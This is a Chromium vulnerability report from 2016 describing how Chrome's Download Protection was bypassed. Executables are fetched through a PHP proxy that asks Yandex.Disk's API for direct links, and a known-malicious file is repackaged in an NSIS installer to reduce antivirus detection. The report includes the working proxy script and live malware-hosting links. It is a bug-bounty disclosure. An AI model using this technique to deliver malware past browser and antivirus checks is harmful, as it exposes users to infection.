Download Protection Bypass
Reported by gordeev....@gmail.com, Apr 21 2016
Issue description

Hello. We want to tell you about a method of downloading a malicious file.

I. We used files that can be downloaded from: https://www.google.com/about/appsecurity/chrome-rewards/

1) The files content.exe and pua.exe were uploaded to Yandex.Disk (https://disk.yandex.ru/), and we got links to the files: https://yadi.sk/d/cl5avITiqnmtz and https://yadi.sk/d/AoYD9FZOqnnPe. We will use these links when making a request to https://cloud-api.yandex.net from a PHP script.

2) We created a web page where you can see how it works. This page includes different links (methods) for download:
2.1 With the help of Yandex.Disk; more details on this method are described below
2.2 Direct link download from our server
2.3 Direct links from https://www.google.com/about/appsecurity/chrome-rewards/

The second and third methods do not allow you to download the files. If you use the first method, you can download the files.

Description of the download method with the help of Yandex.Disk:
a) When the user clicks the download link, an AJAX request is made to the URL: http://test.files-hub.com/request
b) http://test.files-hub.com/request is a PHP script which makes a request with curl to https://cloud-api.yandex.net and adds a parameter. The parameter is a link, as described in paragraph 1. After that, we get the answer with a direct link to the file.
c) The URL that we got in paragraph b is sent back to the AJAX caller on the page http://test.files-hub.com
d) The direct link is inserted into window.location.href with JavaScript, and then the download begins.

File request.php:

    <?php
    // Map the "v" query parameter to one of the public Yandex.Disk links.
    if (isset($_GET['v'])) {
        if ($_GET['v'] == 1)      $link = "https://yadi.sk/d/cl5avITiqnmtz"; // content.exe
        else if ($_GET['v'] == 2) $link = "https://yadi.sk/d/AoYD9FZOqnnPe"; // pua.exe
        else if ($_GET['v'] == 3) $link = "https://yadi.sk/d/Ml4JugUgqmwLS"; // safebrowser.exe
    }
    if (isset($link)) {
        // Ask the Yandex.Disk public API for a direct download URL for the public link.
        $url = "https://cloud-api.yandex.net:443/v1/disk/public/resources/download?public_key=" . urlencode($link);
        $handle = curl_init();
        curl_setopt($handle, CURLOPT_URL, $url);
        // Note: these two options disable TLS certificate verification for the API request.
        curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($handle);
        $code = curl_getinfo($handle, CURLINFO_HTTP_CODE);
        curl_close($handle);
        // Relay the API's JSON answer (containing the direct link) to the AJAX caller.
        if ($code == 200) {
            echo $response;
        }
    }
    ?>

II. The method of downloading another malicious file

1. We found the file goinf_plugin_cis.exe on the internet and uploaded it to virustotal.com. Link to the report: https://virustotal.com/ru/file/9cd6e5b256a4b446826c5b37d8ca7510937131e5ea9706ee96cc67fde1560792/analysis/1459929170/
2. The file goinf_plugin_cis.exe was uploaded to the server; the link is http://test.files-hub.com/files/goinf_plugin_cis.exe
3. With NSIS we created an installer (SafeBrowser.exe). This installer will be downloaded by users, and it runs the main exe file, which includes the malicious code.
4. We checked SafeBrowser.exe on virustotal.com; link to the report: https://virustotal.com/ru/file/45b5013282aa4f428a36257ee339775ca7e02d7fac87b512ff9c7e0c393ea793/analysis/1459959870/ The program is detected by some antivirus systems, but by fewer than the main program.
5. We uploaded the file (SafeBrowser.exe) to Yandex.Disk, and we got a direct link to the file: https://yadi.sk/d/Ml4JugUgqmwLS
6. We also added the links to the exe files to the page http://test.files-hub.com

VERSION
Chrome Version: 49.0.2623.110 m
Operating System: Microsoft Windows 7 Service Pack 1 / Microsoft Windows 10 version 1511
Apr 21 2016
Issue 601125 has been merged into this issue.

Mar 10 2017
For all Download Protection VRP bugs: removing label Restrict-View-Google and adding Restrict-View-SecurityTeam instead.

Mar 11 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by vakh@chromium.org, Apr 21 2016